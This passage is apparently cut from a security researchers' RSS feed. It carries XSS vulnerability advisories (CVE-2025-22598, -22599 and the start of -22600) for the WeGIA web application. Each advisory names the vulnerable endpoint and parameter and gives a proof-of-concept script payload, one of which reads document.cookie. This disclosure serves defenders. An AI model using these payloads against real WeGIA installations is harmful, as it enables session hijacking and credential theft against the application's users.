&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/contribuicao/php/cadastrarSocio.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;cadastrarSocio.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22598/401170099-7710728f-8c09-426d-8f3e-f4d49f82d84a.png&amp;#34;
	width=&amp;#34;809&amp;#34;
	height=&amp;#34;504&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22598/401170099-7710728f-8c09-426d-8f3e-f4d49f82d84a_hu_41e57a1de02764af.png 480w, /p/cve-2025-22598/401170099-7710728f-8c09-426d-8f3e-f4d49f82d84a_hu_461c74bdbd1c4696.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;160&amp;#34;
		data-flex-basis=&amp;#34;385px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9x2j-pw3h-p53f&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9x2j-pw3h-p53f&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 10 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22599</title>
        <link>https://www.cvehunters.com/p/cve-2025-22599/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22599/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22599-cross-site-scripting-xss-reflected-endpoint-homephp-parameter-msg_c&amp;#34;&amp;gt;CVE-2025-22599: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;home.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22599&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22599&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;home.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;home.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22599-cross-site-scripting-xss-reflected-endpoint-homephp-parameter-msg_c&amp;#34;&amp;gt;CVE-2025-22599: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;home.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22599&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22599&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;home.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;home.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22599/401179809-151978eb-6743-46d5-8dae-d0d713e64b52.png&amp;#34;
	width=&amp;#34;1198&amp;#34;
	height=&amp;#34;420&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22599/401179809-151978eb-6743-46d5-8dae-d0d713e64b52_hu_48499e1b4cdde843.png 480w, /p/cve-2025-22599/401179809-151978eb-6743-46d5-8dae-d0d713e64b52_hu_3c70275f215ee3cf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;285&amp;#34;
		data-flex-basis=&amp;#34;684px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8354-6cxw-7g8c&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8354-6cxw-7g8c&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 10 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22600</title>
        <link>https://www.cvehunters.com/p/cve-2025-22600/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22600/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22600-cross-site-scripting-xss-reflected-endpoint-configuracao_doacaophp-parameter-avulso&amp;#34;&amp;gt;CVE-2025-22600: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;configuracao_doacao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;avulso&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22600&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22600&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;configuracao_doacao.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;avulso&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/contribuicao/php/configuracao_doacao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;avulso&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;avulso&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22600-cross-site-scripting-xss-reflected-endpoint-configuracao_doacaophp-parameter-avulso&amp;#34;&amp;gt;CVE-2025-22600: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;configuracao_doacao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;avulso&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22600&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22600&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;configuracao_doacao.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;avulso&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/contribuicao/php/configuracao_doacao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;avulso&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;avulso&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
